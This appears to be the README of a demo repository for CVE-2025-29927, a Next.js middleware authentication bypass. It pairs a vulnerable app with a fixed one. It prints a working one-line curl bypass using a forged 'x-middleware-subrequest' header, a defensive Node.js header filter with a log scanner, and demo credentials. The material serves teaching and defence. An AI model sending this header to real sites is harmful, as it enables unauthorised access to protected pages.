# Next.js Vulnerability Demo (CVE-2025-29927)
This repository contains a demonstration of the Next.js vulnerability CVE-2025-29927, which affects Next.js version 15.2.2 and earlier. The vulnerability allows attackers to bypass middleware authentication checks by setting an `x-middleware-subrequest` header.
## Repository Structure
This is an NX monorepo containing two Next.js applications:
1. **vulnerable-app**: Uses Next.js 15.2.2 with the vulnerability
2. **fixed-app**: Uses Next.js 15.2.3 with the fix implemented
## Vulnerability Explanation
In Next.js versions prior to 15.2.3, there is a security vulnerability in the middleware implementation. The framework does not verify that the `x-middleware-subrequest` header originated internally, so an external client can set this header on an ordinary request and bypass middleware-based authentication checks.
## How to Run the Demo
### Prerequisites
- Node.js 18 or later
- npm or yarn
- Docker (optional, for containerized deployment)
### Running the Vulnerable App
```bash
# Navigate to the repository
cd nextjs-vulnerability
# Install dependencies for the vulnerable app
cd apps/vulnerable-app
npm install
# Start the vulnerable app
npm run dev
```
The vulnerable app will be available at http://localhost:3000.
### Running the Fixed App
```bash
# Navigate to the repository
cd nextjs-vulnerability
# Install dependencies for the fixed app
cd apps/fixed-app
npm install
# Start the fixed app
npm run dev
```
The fixed app will be available at http://localhost:3001.
### Using Docker
You can also run the apps using Docker:
```bash
# For the vulnerable app
cd apps/vulnerable-app
docker build -t nextjs-vulnerable .
docker run -p 3000:3000 nextjs-vulnerable
# For the fixed app
cd apps/fixed-app
docker build -t nextjs-fixed .
docker run -p 3001:3000 nextjs-fixed
```
## Demonstrating the Vulnerability
1. Open the vulnerable app (http://localhost:3000)
2. Click on "Admin" in the navigation bar
3. You'll be redirected to the login page since you're not authenticated
4. Now try accessing the admin page directly with the vulnerability:
```bash
# Using curl
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
# Or use a browser extension like ModHeader to add the header
# and then visit http://localhost:3000/admin
```
With the vulnerable version (15.2.2), you'll be able to access the admin page without authentication by adding the `x-middleware-subrequest` header.
With the fixed version (15.2.3), the middleware correctly validates the origin of this header, and you'll still be redirected to the login page.
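As an added, defender-side example (not code from this demo repository): a small Node.js filter that strips or blocks an externally supplied `x-middleware-subrequest` header before a request is forwarded to a Next.js app, plus a scan over constructed access-log lines to spot past attempts. The log format, the `screenInbound`/`findSpoofAttempts` names and the sample lines are assumptions made for illustration.

```javascript
// Added example: edge-side handling of the x-middleware-subrequest header.
// Header names are lower-cased the way Node's http module presents them.
const SUBREQUEST_HEADER = 'x-middleware-subrequest';

// Decide what to do with an inbound request's headers. Returns the decision
// and a copy of the headers that is safe to forward to the Next.js app.
function screenInbound(headers, { mode = 'strip' } = {}) {
  const lower = {};
  for (const [k, v] of Object.entries(headers)) lower[k.toLowerCase()] = v;

  if (!(SUBREQUEST_HEADER in lower)) {
    return { action: 'forward', flagged: false, headers: lower };
  }
  // The header is only meant to be set internally by the Next.js runtime,
  // so any copy arriving from an external client is suspicious.
  const value = String(lower[SUBREQUEST_HEADER]);
  if (mode === 'block') {
    return { action: 'block', flagged: true, value, headers: lower };
  }
  const { [SUBREQUEST_HEADER]: _dropped, ...rest } = lower;
  return { action: 'forward', flagged: true, value, headers: rest };
}

// Scan access-log lines (constructed format: "<ip> <method> <path> <headers-json>")
// and report requests that carried the header, for retroactive detection.
function findSpoofAttempts(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/^(\S+) (\S+) (\S+) (\{.*\})$/);
    if (!m) continue;
    let hdrs;
    try { hdrs = JSON.parse(m[4]); } catch { continue; }
    const r = screenInbound(hdrs);
    if (r.flagged) hits.push({ ip: m[1], method: m[2], path: m[3], value: r.value });
  }
  return hits;
}

// Constructed sample log lines; the first mirrors the demo's curl request.
const SAMPLE_LOG = [
  '203.0.113.5 GET /admin {"x-middleware-subrequest":"middleware:middleware:middleware:middleware:middleware"}',
  '198.51.100.7 GET /admin {"cookie":"session=abc"}',
  '203.0.113.5 GET /login {"accept":"text/html"}',
];

console.log(findSpoofAttempts(SAMPLE_LOG)); // one hit: 203.0.113.5 GET /admin
```

Stripping at the reverse proxy is a stopgap for deployments that cannot upgrade immediately; the actual fix is the 15.2.3 release shown in the fixed app.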
## Login Credentials
For demo purposes, you can log in with:
- Username: `admin`
- Password: `password123`
## Security Recommendation
If you're using Next.js in production, make sure to update to version 15.2.3 or later to protect against this vulnerability.